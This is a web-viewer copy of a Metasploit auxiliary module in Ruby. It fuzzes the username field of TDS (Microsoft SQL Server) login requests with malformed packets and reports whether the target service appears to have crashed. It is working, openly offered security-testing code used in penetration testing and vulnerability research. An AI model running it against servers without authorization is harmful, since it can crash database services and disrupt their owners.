CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/fuzzers/tds/tds_login_username.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::MSSQL7include Msf::Auxiliary::Fuzzer89def initialize(info = {})10super(update_info(info,11'Name' => 'TDS Protocol Login Request Username Fuzzer',12'Description' => %q{13This module sends a series of malformed TDS login requests.14},15'Author' => [ 'hdm' ],16'License' => MSF_LICENSE17))18end1920# A copy of the mssql_login method with the ability to overload each option21def do_login(opts={})2223@connected = false24disconnect if self.sock25connect26@connected = true2728pkt = ""29idx = 030db = ""3132pkt << [330x00000000, # Dummy size34opts[:tds_version] || 0x71000001, # TDS Version35opts[:size] || 0x00000000, # Size36opts[:version] || 0x00000007, # Version37opts[:pid] || rand(1024+1), # PID38opts[:connection_id] || 0x00000000, # ConnectionID39opts[:flags_opt1] || 0xe0, # Option Flags 140opts[:flags_opt2] || 0x03, # Option Flags 241opts[:flags_sql_type] || 0x00, # SQL Type Flags42opts[:flags_reserved] || 0x00, # Reserved Flags43opts[:timezone] || 0x00000000, # Time Zone44opts[:collation] || 0x00000000 # Collation45].pack('VVVVVVCCCCVV')464748cname = Rex::Text.to_unicode( opts[:cname] || Rex::Text.rand_text_alpha(rand(8)+1) )49uname = Rex::Text.to_unicode( opts[:uname] || "sa" )50pname = opts[:pname_raw] || mssql_tds_encrypt( opts[:pname] || "" )51aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8)+1) )52sname = Rex::Text.to_unicode( opts[:sname] || rhost )53dname = Rex::Text.to_unicode( opts[:dname] || db )5455idx = pkt.size + 50 # lengths below5657pkt << [idx, cname.length / 2].pack('vv')58idx += cname.length5960pkt << [idx, uname.length / 2].pack('vv')61idx += uname.length6263pkt << [idx, pname.length / 2].pack('vv')64idx += pname.length6566pkt << [idx, aname.length / 2].pack('vv')67idx += aname.length6869pkt << [idx, sname.length / 2].pack('vv')70idx += sname.length7172pkt << [0, 0].pack('vv')7374pkt << [idx, aname.length / 2].pack('vv')75idx += aname.length7677pkt << [idx, 0].pack('vv')7879pkt << [idx, dname.length / 2].pack('vv')80idx += dname.length8182# The total length has to be embedded twice more here83pkt << [840,850,860x12345678,870x1234567888].pack('vVVV')8990pkt << cname91pkt << uname92pkt << pname93pkt << aname94pkt << sname95pkt << aname96pkt << dname9798# Total packet length99pkt[0,4] = [pkt.length].pack('V')100101# Embedded packet lengths102pkt[pkt.index([0x12345678].pack('V')), 8] = [pkt.length].pack('V') * 2103104# Packet header and total length including header105pkt = "\x10\x01" + [pkt.length + 8].pack('n') + [0].pack('n') + [1].pack('C') + "\x00" + pkt106107resp = mssql_send_recv(pkt,opts[:timeout])108109info = {:errors => []}110info = mssql_parse_reply(resp,info)111info112end113114def run115last_str = nil116last_inp = nil117last_err = nil118119cnt = 0120fuzz_strings do |str|121# capped at 16-bit lengths122next if str.length > 65535123cnt += 1124125if(cnt % 100 == 0)126print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")127end128129begin130do_login(:uname => str, :timeout => 0.50)131rescue ::Interrupt132print_status("Exiting on interrupt: iteration #{cnt} using #{@last_fuzzer_input}")133raise $!134rescue ::Exception => e135last_err = e136ensure137disconnect138end139140if(not @connected)141if(last_str)142print_status("The service may have crashed: method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")143else144print_status("Could not connect to the service: #{last_err}")145end146return147end148149last_str = str150last_inp = @last_fuzzer_input151end152end153end154155156